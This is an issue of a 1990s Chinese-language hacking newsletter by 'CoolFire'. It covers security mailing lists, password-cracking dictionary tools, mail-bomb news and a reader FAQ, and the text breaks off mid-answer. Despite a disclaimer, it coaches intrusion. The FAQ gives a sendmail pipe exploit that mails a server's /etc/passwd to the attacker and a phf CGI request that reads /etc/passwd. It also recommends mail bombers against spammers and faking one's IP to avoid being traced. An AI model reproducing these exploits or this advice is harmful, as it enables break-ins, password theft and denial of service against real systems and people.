這不是一個教學文件, 只是告訴你該如何破解系統, 好讓你能夠將自己的系統作安全的
保護, 如果你能夠將這份文件完全看完, 你就能夠知道電腦駭客們是如何入侵你的電腦,
我是 CoolFire, 寫這篇文章的目的是要讓大家明白電腦安全的重要性, 並不是教人
Crack Password 若有人因此文件導致惡意入侵別人的電腦或網路, 本人概不負責 !!

寫這些文章真的花了蠻多時間的, 我也沒辦法確定甚麼時候可以寫好下一篇, 所以沒有
辦法預告, 因為預告不准的話會挨罵的. 以後寫 CoohHC 的時間會少很多的, 因為工作
越來越多的關係, 希望大家見諒, 如果一兩個月才出現一篇的話也不要罵我喔~ 如果你
曾經用印表機把這些文章一篇篇的印出來的話, 你就應該知道寫這些東西有多辛苦了,
上次在朋友那邊看到, 差點吐血!

首頁上的網友交流版是一個不錯的交流方式, 在 CoolHC 沒有寫的這段時間大家可以在
上面聊一聊自己的破解心得, 這樣我也可以少寫一些 FAQ, 當然在上面有經驗的網友們
也可以分享一下你們的經驗, 讓一些新手快點進入狀況, 不會再問一些怪問題~

**** Mail List 訂閱 ****

事實上, CoolHC 寫到這裡已經沒有甚麼可以多講的了, 因為有很多東西並不是用技巧來
破解, 我們所使用的都是系統的漏洞. 而這些漏洞, 有些由於已經出現了很久, 所以有
些網站也已經更新了這些問題, 你就沒有辦法得到你所預期的結果了. 除非你能夠在他
們 Patch 之前先進入, 所以就必需要取得最新的 Bugs 資訊.

在網路上有很多系統安全討論的 Mail List, 這些 Mail List 討論的內容大多與各系統
的安全性有關, 所以在討論內容上也都會圍繞著新的 Bugs 打轉, 如果能夠善加的利用這
些資訊, 相信你可以在得到新的 Bug 資料時就輕易的拿下很多網站的密碼檔案.

所以在這一期的內容上, 我們就以如何訂閱這些 Mail List 為主題, 讓大家能夠吸收到
這些新的資訊, 這樣也不會等到 CoolHC 寫好的時候, 大多數的 Bugs 都已經補上了.

[1] 8lgm (Eight Little Green Men)
加入方式: 寫一封 E-Mail 到 majordomo@8lgm.org 標題不用填寫, 在信件內容的地
方填上: subscribe 8lgm-list

[2] Academic Firewalls
加入方式: 寫一封 E-Mail 到 majordomo@net.tamu.edu 標題不用填寫, 在信件內容
的地方填上: SUBSCRIBE Academic-Firewalls

[3] Alert
加入方式: 寫一封 E-Mail 到 request-alert@iss.net 標題不用填寫, 在信件內容
的地方填上: subscribe alert
取消訂閱: 寫一封 E-Mail 到 request-alert@iss.net 標題不用填寫, 在信件內容
的地方填上: unsubscribe alert
討論主題: Security Product Announcements
Updates to Security Products
New Vulnerabilities found
New Security Frequently Asked Question files.
New Intruder Techniques and Awareness

[4] Best of Security
加入方式: 寫一封 E-Mail 到 best-of-security-request@suburbia.net 標題不用
填寫, 在信件內容的地方填上: subscribe best-of-security

[5] Bugtraq (CoolFire 推 )
加入方式: 寫一封 E-Mail 到 LISTSERV@NETSPACE.OR 標題不用填寫, 在信件內容的
容的地方填上: SUBSCRIBE BUGTRAQ
討論主題: Information on Unix related security holes/backdoors (past and present)
Exploit programs, scripts or detailed processes about the above
Patches, workarounds, fixes
Announcements, advisories or warnings
Ideas, future plans or current works dealing with Unix security
Information material regarding vendor contacts and procedures
Individual experiences in dealing with above vendors or security organizations
Incident advisories or informational reporting

[6] COAST Security Archive
加入方式: 寫一封 E-Mail 到 coast-request@cs.purdue.edu 標題不用填寫, 在信件
內容的地方填上: SUBSCRIBE coast

[7] Computer Privacy Digest (CoolFire 推 )
加入方式: 寫一封 E-Mail 到 comp-privacy-request@uwm.edu 標題不用填寫, 在信件
內容的地方填上: subscribe cpd

http://www.uwm.edu/org/comp-privacy/ (一些舊文章的收集, 蠻有用處的)
Gopher: gopher.cs.uwm.edu.

[8] Computer Underground Digest
加入方式: 寫一封 E-Mail 到 CU-DIGEST-REQUEST@WEBER.UCSD.EDU 標題不用填寫, 在
信件內容的地方填上: SUB CUDIGEST
新聞論壇: comp.society.cu-digest (USENET)

[9] Cypherpunks
加入方式: 寫一封 E-Mail 到 majordomo@toad.com 標題不用填寫, 在信件內容的
地方填上: SUBSCRIBE cypherpunks

[10] Cypherpunks Announce
加入方式: 寫一封 E-Mail 到 majordomo@toad.com 標題不用填寫, 在信件內容的
地方填上: SUBSCRIBE cypherpunks-announce

[11] Euro Firewalls
加入方式: 寫一封 E-Mail 到 majordomo@gbnet.net 標題不用填寫, 在信件內
容的地方填上: SUBSCRIBE firewalls-uk email-addr

[12] Firewalls
加入方式: 寫一封 E-Mail 到 majordomo@greatcircle.com 標題不用填寫, 在信件
內容的地方填上: SUBSCRIBE firewalls

[13] Intrusion Detection Systems
加入方式: 寫一封 E-Mail 到 majordomo@uow.edu.au 標題不用填寫, 在信件內容
的地方填上: subscribe ids
討論主題: techniques used to detect intruders in computer systems and computer networks
audit collection/filtering
subject profiling
knowledge based expert systems
fuzzy logic systems
neural networks
methods used by intruders (known intrusion scenarios)
cert advisories
scripts and tools used by hackers
computer system policies
universal intrusion detection system

[14] NT Security
加入方式: 寫一封 E-Mail 到 request-ntsecurity@iss.net 標題不用填寫, 在信
件內容的地方填上: subscribe ntsecurity
取消訂閱: 寫一封 E-Mail 到 request-ntsecurity@iss.net 標題不用填寫, 在信
件內容的地方填上: unsubscribe ntsecurity

[15] WWW Security
加入方式: 寫一封 E-Mail 到 www-security-request@nsmx.rutgers.edu 標題不用
填寫, 在信件內容的地方填上: SUBSCRIBE www-security email_address
(上面的 email_address 填你自己的 E-Mail)

[16] Linux Security
加入方式: 寫一封 E-Mail 到 majordomo@linux.nrao.edu 標題不用填寫, 在信件
內容的地方填上: SUBSCRIBE linux-security your-name
(上面的 your-name 填你自己的名字, 最好填英文的, 怕他們看不懂)

[17] Linux Security Alert
加入方式: 寫一封 E-Mail 到 majordomo@linux.nrao.edu 標題不用填寫, 在信件
內容的地方填上: SUBSCRIBE linux-alert your-name
(上面的 your-name 填你自己的名字, 最好填英文的, 怕他們看不懂)

[18] Sun Security Alert
加入方式: 寫一封 E-Mail 到 security-alert@sun.com 標題不用填寫, 在信件內
容的地方填上: SUBSCRIBE CWS email-addr
(上面的 email-addr 填你自己 E-Mail)


上面我林林總總列出了 18 個 MailList, 請針對你喜歡的來訂閱, 當然也可以全部訂
閱, 日後覺得不需要哪一些的時候再取消掉, 在 MailList 上發信請注意 MailList 的
使用禮節及一些發信上應該注意的問題, 這些在訂閱後自然會有說明寄給你. MailList
上有些會有存放 FAQ 的地方, 也請各位先看一看這些 FAQ 再發問. 嗯, 以後大家就要
靠自己羅, 若有新發現也別忘了來封信告訴我!!!!

**** Crack 工具 ****

[JackAss V1.1]
許多網友最喜歡的就是這一篇了, 所以這一篇好像是少不了的, 但是軟體更新的速度事
實上可能沒有我們的文章快. 上次介紹的 John the Ripper 1.3 大家用了覺得如何???
有沒有甚麼大問題呢? 應該還不錯吧! 這次要介紹的是 JackAss V1.1 是我剛在國外網
頁上抓回來的, 也不知道出現了多久, 看一下檔案日期是 4-09-96, 好像已經出來很久
了, 都沒有注意到它的存在.

一般我們以 CJack 來破解密碼檔案的時候, CJack 是以呼叫字典檔, 然後逐字加密再進
行比對的方式來作解碼的動作, 所以並不是所有的密碼都找得到, 所以就有人想出以暴
力的方式來解碼, 前題是機器夠快, 然後時間夠多, 才能避免浪費掉很多系統的時間.
CJack 在設計的理念上就是這樣, 所以基本上還是略顯不足, 所以才會有很多的輔助工
具出現, 像先前幾篇我們所介紹的 KOS 就是一個例子.

JackAss 基本上是一個輔助 Jack 的工具, 跟 KOS 一樣, 需要有 CJack 才能夠執行,
他的英文註解是: Add On For CrackJack, 與 KOS 不同之處是: KOS 對 CJack 的不足
處作了補強, 讓 CJack 可以跑出一些大小寫數字混合的密碼, 而 JackAss 則是一個完
全不同的方式, 他不需要使用任何的字典檔, 因為它本身就是一個字典檔產生器. 當你
使用 JackAss 來作為 CJack 的前導, 執行 JackAss 之後他會依照你的選項來製造出字
典檔, 然後再呼叫 CJack 來跑這些字.

試了一下 JackAss 似乎功能上不怎麼樣, 有點類似國內上次出現的那支密碼破解程式,
不過速度上倒是比較快, 如果你是要用暴力法來破解, 又有幾台不錯的機器, 你可以試
著在不同的機器上跑, 這樣速度會快一點, 如果單用一台機器要跑暴力法, 可能就很累
了. 當然, 如果你可以只跑單一 User 的話, 速度會快一點, 所以我建議拿 JackAss 來
跑 root 的部份, 其它的用 GlobalKOS 來跑字典法就行了~~ 不要那麼累!

之前在 tw.comp.security 看到有幾位網友在討論解碼的文章, 其中有一位網友的觀點
跟我的有點相像, 他的說法是: 將所有的字典檔先編碼, 存成一個大型的資料庫, 當你
抓回密碼檔的時候, 直接用密碼檔來作逐行的比對, 這樣速度上會快一點, 因為省去了
編碼的時間. 如果有人要作這樣的程式的話, 我想應該要有一個不小的硬碟, 用來儲存
這個完成後頗大的資料庫, 然後查詢方面最好是用 SQL 來作查詢, 速度上應該會快一點
因為在其它的查詢方法上, 如果資料庫非常龐大, 可以系統跑起來會像當機一般吧?? 再
者機器的速度應該也要夠快, 最好呢, 能夠寫出一個 CGI 來 Call 這支程式, 讓大家可
以在網頁上丟出 passwd 檔來查詢, 再將查詢完的結果寄回電子郵件信箱中. 這看起來
好像有點神話, 其實這很容易作到的, 只是沒有人真的這樣作, 是嗎?? 目前還沒預估過
這樣作所須要的主機配備, 大家有空的時候幫忙想一想吧??

[WordList V1.0]
這個程式是一支字典檔產生器, 他能產生五個字的字典檔, 就是排列組合啦~ 也沒有用
甚麼特殊的方法, 使用他來產生字典可以產生一個相當大的字典, 不過速度上相當的慢
就是了, 這種程式所產生的字典有點暴力, 因為他跟本不依照字典的方式來產生, 但是
所產生的字也就相當的可觀, 不過只要密馬是五個字的, 都一定逃不過~ 屬於暴力法的
一種. 速度慢? 慢到甚麼程度呢? 你親自的試一下就知道了, 我跑到一半就把它停掉了,
不曉得是用甚麼語言寫的, 還 For Win 3.x/95, 純 DOS 下無法執行. 除了速度慢的缺
點之外, 這支程式所跑出來的字典檔是五個字的, 我覺得真對五個字的密碼來作解碼是
有點暴力, 不過大家應該把自己的密碼弄長一點, 因為之前我破解的一組密碼, 居然有
人用一個英文字元來當密碼, 系統管理人員應該將密碼設定最少四個字元, 這樣密碼才
不容易被人盜用, 不然就將系統安全作得好一點, 不要讓人輕易的拿到 passwd 檔.

>> 這些檔案你都可以在我們的首頁中抓到!

**** 新舊短聞 ****

UpYours 4 好像還沒有正式版本的消息, 不過最近 Beta3 已經推出了, 但是在 OTRiCS
所得到的消息, GlobalKos 決定放棄 UpYours 這個專案, 也就是說以後可能沒有這套軟
體可以用了. 也沒有錯啦, 最近的 Mail Server 跟 Server 間的傳輸是要經過認證的,
Mail Bomb 也對許多人造成了困擾, 甚至干擾到網路正常的運作, 認證之後可能會發生
你的匿名 Mail 無法真的匿名的問題, 勸大家還是少用吧! 有機會我會將可能是最後一
個版本的 UpYours Beta 3 放在首頁上讓大家留念, 上面這個消息還沒有得到 GlobalKOS
這個 Group 的證實就是了.
詳細的狀況大家可以到: http://www.otrics.com/hackr1.html 翻翻看! 記得看仔細一點
喔, 因為有很多的資訊, 這邊都有連結點啦~~

GlobalKOS 的站台在幾個月前不明原因 "消失" 了, 有人可能還沒有見過就連不上了, 我
找到了一個以前的 Mirror 點, 在上面也可以下載 KOS 及 UpYours, 有興趣的網友可以
連到: http://www.wilter.com/ehack/files/misc/koskrack.html 瞧瞧~

使用 Windows 95 及 Windows NT 的網友, 應該已經被 Out-Of-Band 煩死了吧? 這個系
統的漏洞真的是害了許多人, 微軟也還沒有為這個事件發表甚麼意見, 不過 for 95 的
Patch 已經出來了, Windows NT 的使用者也可以趕緊下載 Service Pack 3 來補一補!!
不然很可能下一秒鐘被 ReBoot 的就是你的系統.

**** 首頁統計 ****

我們的首頁感謝大家的支持, 現在人數 20427 人次? 經過 Web Count 的追蹤, 每天的
平均上站人次是: 274 人次, 至於上站的[時間/人數]對照如下表:
+---+---+---+---+---+---+---+---+---+---+---+---+---+
| 時| 00| 01| 02| 03| 04| 05| 06| 07| 08| 09| 10| 11|
+---+---+---+---+---+---+---+---+---+---+---+---+---+
| 人| 13| 13| 11| 8| 5| 5| 5| 5| 8| 9| 10| 11|
+---+---+---+---+---+---+---+---+---+---+---+---+---+
| 時| 12| 13| 14| 15| 16| 17| 18| 19| 20| 21| 22| 23|
+---+---+---+---+---+---+---+---+---+---+---+---+---+
| 人| 12| 12| 10| 11| 11| 12| 11| 11| 12| 12| 13| 13|
+---+---+---+---+---+---+---+---+---+---+---+---+---+
塞車時段: 22~01 疏通時段:04~07

+-----+-----+-----+-----+-----+-----+-----+
| SUN | MON | TUE | WED | THU | FRI | SAT |
+-----+-----+-----+-----+-----+-----+-----+
| 271 | 249 | 236 | 254 | 223 | 247 | 254 |
+-----+-----+-----+-----+-----+-----+-----+
感覺上都差不多, 星期天是多了一點

作這個統計, 可以讓大家在上站的時候, 挑選比較好上站的時間, 這樣才不會浪費你寶
貴的時間在等待資料的傳輸, 這些資訊你也可以在首頁上點選 Web Story 按鈕看到,
每個小時會更新一次, 請多多利用!

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*

**** CoolFAQ ****

[Q0]
我自己有一個 Home Page, 我要如何在我的Home Page上連結你的首頁呢???
[A0]
我們的首頁連結圖片放在:
http://www.showtower.com.tw/~fetag/fetag.gif
首頁連結, 請連結到:
http://www.showtower.com.tw/~fetag/Hack.htm
所以你只要在你的 HTML 檔中加上底下這一行就可以了:
飛鷹工作室

[Q1]
我一進去的目錄是"/",我用ls指令後都沒有看到資料夾,有沒有可能是把/etc/passwd隱
藏了呢?我進去時先出來的畫面: 220 flag12 Microsoft FTP service (Verision2.0)
我又用了anonymous.ftp.這兩個username進去,也成功了而且目錄也都一樣,那有沒有可
能passwd不放在這裡?
[A1]
因為一般我們在找 password 檔的時候, 我們測試(實作)的 Server 都是使用 Unix 的 Server
來作, 所以我會寫是 /etc/passwd, 照你這個情況看來, 你進入的 FTP Server 應該是 Window
NT 的系統(我也沒有把握能夠確定這件事), 如果是這樣的狀況的話, 一般的 WinNT
系統是不會有 /etc 這個目錄的, 自然也就無法用 ls 指令看到了!

[Q2]
我覺得知道某人的IP又能怎樣呢? 現在ISP都是使用不固定的IP呀? 若你說有紀錄呀?
可是像我使用非自己的或是免費的呢?像我的網頁就有告訴人家免費上網(中研院提供的)
查到IP也沒用呀?為何還需要用E-mail bomb 的隱密IP呢?我實在想不通, 可以告訴我嗎?
[A2]
對呀!! 但是如果該主機可以查出該 IP 的確實上線時間 (有 Log 檔可查)另外也可以
再經由電信系統查甚麼時候撥到哪支電話的電話號碼, 循線就可以逮到你了~ 但是現在
電信局不太管這樣的事, 不過如果你犯了很大的錯, 有檢察官要求他們查, 你說查不查
得到 ????? IP 固不固定又很重要嗎 ??? 還是能 Fake IP 是最好的~~ 把 Ping關掉??
呵呵~~ 想通吧!

[Q3]
1.I can't download KeyPro Emu'. I think the location is wrong. Can you send it
to me?
2.嗨...,UpYours3還是傳不下來...能否告訴我其他地方哪裡有? or用別的方法寄來?
(真的!沒騙你,我每次下載到1.xMB時,就會卡住,都不動了...)
3.I can not download kos.zip by FTP. Can you use UUDECODE to past the kos.zip
to me ?
[A3]
有很多網友在傳檔案的時候都會發生這種狀況, 由於我的 ISP 日前將 DNS Server 及
Http Server 作了一些調整, 有些檔案好像沒有搬好的樣子, 目錄底下遺失了一些檔案,
自然各位也就沒有辦法抓到了, 不過有很多檔案可以在 File Mirror Site 抓到, 目前
我們有熱心的網友提供了 ftp.cads.com.tw/pub/security 這個位址供本站 Mirror 一
些檔案, 我也將一些較大, 大家比較不容易抓下來的檔案都放了一份在上面, 所以不管
是甚麼檔案, 如果有抓不下來, 或是系統告訴你有連結錯誤的, 你都可以到這個 FTP
抓取, 不過該主機對 Anonymous 設限, 一次最多只能有 5 的使用者同時上線抓檔, 如
果有連不上的, 就請你找個比較不塞車的時間再上去抓抓看! 我們沒有辦法提供 E-Mail
送檔的服務, 雖然之前有幫幾位網友送檔, 但是現在有了 ftp 讓各位自己抓取, 我們也
就不浪費網路的頻寬及時間了.

[Q4]
我已經申請了cyberspace的帳號,請問要從那一個畫面連上cyberspace,然後再去crack?
如果我用ftp or telnet進入了系統,那我的IP位址和我所做的任何動作會不會在那裡留
下任何線索?
[A4]
我想你們都誤會了我的意思, 不是說你 Login 進入 Cyberspace 再 Login 到別的站台,
別人就只會查到你在 Cyberspace 的帳號, 事實上當你 Login 進 Cyberspace 時, 也已
經暴露了你目前的 IP, 因為你 Login 的時候 Cyberspace 也會詢問你的 IP.


[Q5]
1.你的站為什麼關了?
2.I can't download Cracker Jack,KOS and other files,why?
This is the error message when I download "Cracker Jack 1.4":
Error 404
Not found - file doesn't exist or is read protected even tried multi
CERN httpd 3.0
3.When i join your Homepag, i receive the error:
HTTP/1.0 404 Object Not Found .
What has happend?
[A5]
那一陣子由於我的 ISP 這邊傳輸的狀況並不是很好, 所以有很多人可能連上來的時候找
不到東西了, 這個問題也一直困擾我很久, 但是也是沒有辦法真正的徹底解決, 所以如
果有這種狀況的話, 請大家寫信通知我一下, 如果是遷移到其它的 Web 站去, 或是暫時
停止服務的話, 我們也會在上面作一些說明, 不會有讓大家找不到的情況發生的!

[Q6]
Sorry to bother you again,because I thought the "John the Ripper". can help me
find out the register code which I want;however,can you hepl me to find out
the register code for the software "Xing MPEG Player 32-Bit 3012 Trial",which
I down loaded from ......
[A6]
居然有人會來找我問軟體註冊碼的問題, 我可沒有辦法回答, 這不是我的專業, 當然破解
站台也不是我的專業, 所以如果有此類的問題的話, 請各位到 alt.hacker 論壇去發問,
或是在國內找找其它提供註冊碼的站台, 我沒有辦法幫你耶....:(

[Q7]
你知道嗎?news上俞煌男有寫一個程式是sendmail 收到password to you know?你是否也
有同樣的program?and letmein 2.0不知進展如何?
[A7]
呵呵~~ Know How 是不是?? 其實要看他寫出來的東西是針對哪個 Sendmail 版本啦, 像
很多版本的 Sendmail 都有被人家抓出一些 Bug 出來, 那也要看這個 Bug 的危險性到
甚麼程度,一般這些東西都會有人整理出來, 但是如果 Mail Server 使用的剛好不是
Bug 有列出來的話, 你可能也沒有辦法了吧?? 我舉一個很久以前在 Bugtraq 上面看到
的 sendmail bug 來作說明好了, 這個 Bug 的版本我忘了, 好像是 sendmail 5.6 的吧
(很久了), 現在不曉得還有沒有人在用這個版本, 如果有的話, 就算他倒霉好了! 是這
樣的, 這個版本的 Sendmail 可以讓人執行一些指令, 所以我們可以利用這個漏洞把
passwd 檔寄給自己, 而連到 smtp 就可以控制 sendmail 來發信了!

telnet xxx.xxx.xxx 25
helo MyDear
mail from: "|/bin/mail me@myhost rcpt to: me@myhost
data
this is a test mail
.

像這樣就可以讓這台主機把他自己的 /etc/passwd 寄給我了, 但是也要看他有沒有提供
mail這支程式, 有沒有放在 /bin 目錄, 像這目錄也是很重要的, 有的例子我舉出來像
cgi hole 我是舉例他放在 /cgi-bin 目錄, 但有些人的目錄名稱是 /cgi 或 /bin 或
/exe 就沒有人會變通, 一直寫信來問我, 為甚麼照這個指令沒有辦法抓到... 等等, 很
難講啦, 誰曉得他們目錄命名的方式,都是隨人家高興的嘛~~

不過像你所講的, 把這種 Bug 寫成程式來抓 passwd 檔, 那是不是要針對很多版本的
sendmail 都要有判斷? 再針對每個版本送出不同的指令? 如果真的可以寫出來這樣的程
式的話, 那一定是很不錯, 不過這應該還只是一個理想吧?? 俞兄如果有寫好的, 請寄送
一份給小弟, 我倒想看看程式可以強到甚麼程度. 還有, 並不是每個 sendmail Bug 都
是連上 smtp 就可以作了, 有些還要寫一些小程式 (Scripts) 才跑才有用, 也就是說你
必需要有一個 login 到該 server 的帳號才行.... 所以..... 難說啦!

[Q8]
I already download avalanche v2.8 mail bomber,but I can't send it! When I
start send the bomb massage,why always receive 553 error ot other error?
can you help me how to seng it!

[A8]
有些 MailBomb 我並沒有實際的測試過, 因為種類實在太多了, 現在好像越來越多人喜
歡寫這種程式, 如果你有類似的問題, 可以到我們首頁上的留言版發問, 相信有用過的
網友會提供你一些設定上的建議, 讓你的程式能夠正常的運作.
[Q9]
Hi, I read your hack homepage, it's very good. Do you know any BBS or sites
about system security & hacking? They are always underground, I can't find
them.Thanks alot.

[A9]
目前中文的 Hack Homepage 大多都是關於軟體註冊碼的網站, 有些網站現在也會提供一
些關於破解主機方面的資訊, 我們將在首頁上建立一些網頁的連結點, 讓網友們可以到
其它的網站上看看其它的破解資訊, 如果你有建立一個相關的網頁的話, 請寫信給我,
我會將你的網頁加入我們站上的連結. 至於 bbs 的話, 各大專院校的 bbs 應該都有
Hacker 區的討論, 目前國內以交大資工的 Hacker 區資料最為豐富, 你有空也可以上去
看看. bbs.cis.nctu.edu.tw
[Q10]
很冒昧的打擾你,小弟拜讀你的大作中 coolhk2 時,便實地的操練了一下,當小弟在瀏
覽器中下達︰
http://xxxxxx/cgi-bin/nph-test-cgi?*
後,誠如你所說的一份報表出來如下︰
CGI/1.0 test script report:
argc is 1. argv is \*.
SERVER_SOFTWARE = Apache/1.0.0
SERVER_NAME = auto.nypi.edu.tw
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/1.0
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT = image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,*/*
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /cgi-bin/nph-test-cgi
QUERY_STRING = 2 Count.cgi acc acc.c archie calendar count date discuss doit.cgi dopost.c
finger fortune guestmsg guestmsg.c imagemap jj move.pl nph-count nph-test-cgi phf post-query
post.c query ranking re.c repost.c repost.c.bak test-cgi test-cgi.tcl uptime vote.pl wais.pl
REMOTE_HOST = 140.130.1.218
REMOTE_ADDR = 140.130.1.218
REMOTE_USER =
CONTENT_TYPE =
CONTENT_LENGTH =
但是當小弟再接著輸入︰
http://xxxxxxxx/cgi-bin/phf?Qalias=x%0aless%20/etc/passwd
可是卻沒有 passwd 出現,僅出現如下︰
Ⅰ.
Server Error
The server encountered an internal error or misconfiguration and
was unable to complete your request.
Please contact the server administrator, allen@auto.nypi.edu.tw and
inform them of the time the error occurred, and anything you might have
done that may have caused the error.
Ⅱ.
Query Results
/usr/local/bin/ph -m alias=x less /etc/passwd
上面的 Ⅰ及Ⅱ 是小弟分別在不同的站所試出的結果,請問一下為什麼會如
此呢,是不是小弟指令下錯了或者是該站的軟體已經把 bug 給 patch 過了
,謝謝你!
[A10]
正如你所說, 可能這個站台已經把他們的 httpd Patch 過了, 所以沒有辦法拿到, 也不
一定要用 less 指令, 也可以用 more, cat 等指令來試看看, 你上面所下的指令應該都
正確才對,如果真是已經 Patch 過了的話, 就只好試試看系統有沒有其它的漏洞羅.

這個漏洞主要是系統所提供的 phf 的 bug, 有些主機在 test-cgi 的 Report 上的 Query
String 那一行沒有 phf, 也就表示這台主機沒有提供 phf 這個 cgi 讓你使用, 也就沒
有辦法用這個方式來取得 passwd 檔了.

[Q11]
1. Can you tell me how to find the KOS file by YAHOO.The best of idle is tell
me the FTP site.Thank you. :)
2.我給您發完信後,想從您的首頁上拉個CJACK14下來,發現上面好像沒有耶 我點取了
那個名字,可是報告說沒有這個文件。 (~~~~~~~~~~~~不會是沒有吧
[A11]
你現在已經可以在 ftp.cads.com.tw/pub/security 中拿到這個檔, 這是由網友 Robin
所提供的ftp, 站台上許多程式都可以在這裡抓到. 如果你在我們站台上抓不下來, 請到
這裡試試, 如果你想在 Yahoo 上找的話, 尋找 globalkos 這個關鍵字, 可以順便連到
國外的站台看看他們擺了哪些東西, 亦可順便學點東西喔~~

[Q12]
Can you tell me how to check infomation of host? How to know the FTP server
and MAIL server?

[A12]
對, 有很多網友來信詢問如何破解某某站台, 如何破解.... 都沒有順便說明一下你們想
破解的系統是屬於哪種系統, 先教大家看一下系統名稱, 你只要 telnet 進入, 當 Unix
提示符號出現的時候, 用 uname -svrmn 就可以看到了, 各選項代表的意義如下說明:
-s: Show System Name, -v: Show Operating Version, -r: Reveals The Software Release Level
-m: Identifies The Machine Hardware For You -n:The node name of the computer is revealed
另外再來說明一下如何看 Sendmail 版本, 我們只要連到 Port 25 就可以看到了, 如:

telnet ms1.xxxxxxxxx.xxx.tw 25
220 ms1.xxxxxxxxx.xxx.tw Sendmail 5.65v3.2 (1.1.8.2/30May97-0801PM) Fri, 6 Jun 1
997 11:38:23 +0800

至於 ftp 呢? 你只要連上 ftp 就應該會在畫面上看到他的版本名稱了, 如:

C:\WINDOWS>ftp ftp.xxxxxxxxx.xxx.tw
Connected to ftp.xxxxxxxxx.xxx.tw.
220-Serv-U FTP-Server v2.2 for WinSock ready...
220-Welcome to xxxxxxxxxxxx xxx Ftp Server(ftp.xxxxxxxxx.xxx.tw).
220-From xxx.xx.xxx.xx


[Q13]
請問你能否告訴我如何製造mail bomb,因為最近老是收到廣告信或者有的沒有的,實在很
討厭.
[A13]
首頁上有一堆Mail Bomb 的程式, 你需要的只是把他們抓下來, 然後在電腦上跑就行了,
當然裡面也都有說明檔之類的文件. 在收到廣告信件的時候, 請不要一昧的回信, 因為
有些發 MailList 的人, 對系統的運作並不 解, 有時可能是利用在帳號目錄設 .foward
的方式來發信的, 而信件中的 Reply to: 欄位填的也是該帳號, 當遇到這種情況的時候,
你所發的信會讓所有在這個 MailList 的人都收到, 如果所有的收件人都回這封信的話,
那你的信箱一定就爆爛了! 所以要先冷靜的分析一下這封信的發法, 會不會傷害到別人,
再決定要怎麼辦, 千萬別亂炸!~ MailBomb 也會害到自己的, 切記~

[Q14]
您好!我是XXXXXXXXXXXXXXXXX!!對於您寫的TXT2DIC 有一點問題!為什麼所建的密
碼檔PASSDICT不會增加!只是每增加一次字典,PASSDICT會隨著不同!
[A14]
TXT2DIC 的產生方式會覆蓋掉舊有的檔案, 所以請在使用的時候使用不同的檔案名稱,
目前最新的 TXT2DIC V1.2 也還沒有使用 File Append 的方式, 所以仍然會將舊檔案覆
蓋, 若你不想覆蓋舊檔, 請使用不同的檔名來進行轉換! 否則程式將不會給你任何的警
告就把檔案蓋下去了!

[Q15]
在網路閒逛時發現FETAG Software's Hacking Page像發現寶一樣的下載了Coolhc#1-6,
在以前電影、小說所描述的駭客情節,以為只有在外國才有的事,想不到在台灣已有人
在這片領域默默的耕耘,雖然我不是很聰明但還是很有興趣的想出點力。拜讀你的大作
似乎有點意猶未盡,想請教你什麼時候再出第七集,坊間有什麼中文的入門書可參考的
。還有想當一個駭客族會不會很難。
[A15]
謝謝你的鼓勵, 7 跟 6 之間的確是隔了很久, 且這一篇也沒有講到甚麼東西, 有點對不
起大家的等待了. 若想要學入侵, 希望各位能多看一看 Unix 方面的書, 先將 Unix 的指
令讀熟, 最基本的當然就是 Shell 指令, 再來就是學著寫一些簡單的 Shell Script,
若沒有餘力自己找系統的漏洞, 又想要破解站台, 建議要多看看一些系統安全的 Mail
List, (好多老話重談), 這一篇就針對 Mail List 的部份, 有簡單的介紹, 讓大家對這
些系統安全的 Mail List 有些 解, 進而多吸收一些知識.

[Q16]
我想請問一下,我是用Browser抓/etc/passwd的, 面root的密碼是被編過碼的嗎?
我用Crack Jack 1.4解碼。但是好像不行,到底要用什麼解才對,一下用Crack Jack,一
下又用Brute,我都看不懂,還有就是UltraEdit是什麼?Pass2Dic有用嗎?還有我用
NetTerm 4.1版for win31可是ftp or sendmail好像都進不去,是什麼原因呢?另外就是
我用CuteFtp 1.8版,Login設anonymous or Double,ID和passwd都空白,但是為什麼就
可以進Ftp,然後用NetTerm卻進不去? 還有KOS(1.?M)的不會用。
[A16]
好多問題喔~ 我一一的簡短回答:[1]要看 Passwd 是否是編碼過的, 在 CoolHC#1 中就有
說明, 我沒有親眼看到 passwd 檔, 沒有辦法回答. [2]CrackJack 跟 Brute 都是功能相
同的程式, CrackJack 速度比較快, 請你先看一下 CoolHC1~6 之後再發問, 因為有很多
東西都是寫過的了! [3]UltraEdit??? 文書編輯程式, 我用它來寫 Home Page [4]Pass2Dic
在 CJack 上已經有選項了, 但是在 Brute 之類的成式上就用得到. [5]ftp 有提供匿名
登入, 但是在 Telnet 沒有, 所以無法登入. [6] KOS 的用法也寫過了!

[Q17]
when i use txt2dic.exe , i can't use it first, when i go into the third step
it show " incorrect dos version....done!" secondly, when i gp into the fourth
step , it show" have some error on code-62 "what's wrong ?
[A17]
第一個問題, 在第三步驟發生 Incorrect dos version, 你用的是 1.0 版, 所以需要呼
叫到 dos 的 sort 程式, 請使用 1.2 版 (For Win32 only) 就不會有此狀況了! 二,你
發生 Error 62 的狀況, 這在上一次的 FAQ 中也有講過了, 請去翻一翻就 解了! 不過
這個狀況也在 1.2 版改進了, 所以建議還是用新的版本, 就不會有這種狀況發生了!

[Q18]
When I get a passwd file which is shadowed....Please tell me how to do....
[A18]
如果我跟你講, 無解呢?? 有些 shadow 過的檔, 只要你有辦法抓到另外一個 shadow 檔
是有辦法解開的, 但是單要使用 shadow 過的檔, 我不相信有人能夠解開~ 所以還是要抓
到另一個來 "配對" 才有用! 至於如何抓到 shadow? 很多人都有這樣的問題, 那就要看
系統 "提供" 的漏洞多不多了, 不然它 shadow 也就沒有意義羅!

[Q19]
First of all, I'd like to give you some feedbacks about your page.
I'm not in Vancouver. I always encounter the slow transfer rate with many
Taiwanese sites. I only got 30 bytes/sec with your site. I don't know the
reason... Anyway, you are the first Chinese hacking page I've ever seen.
I like that. I just want to learn more. Could yu give me some Chinese hacking
pages' addresses? I will be glad to visit them. By the way, I'm not interseted
in emailbombs, because they hurt others. But I'm interested in defensing and
cracking emailbombs. I hope you can update your page oftenly. Thanks a lot!
[A19]
謝謝你, 我們會盡量的更新我們的網頁, 至於其它中文的類似站台??? 嗚... 你們在哪
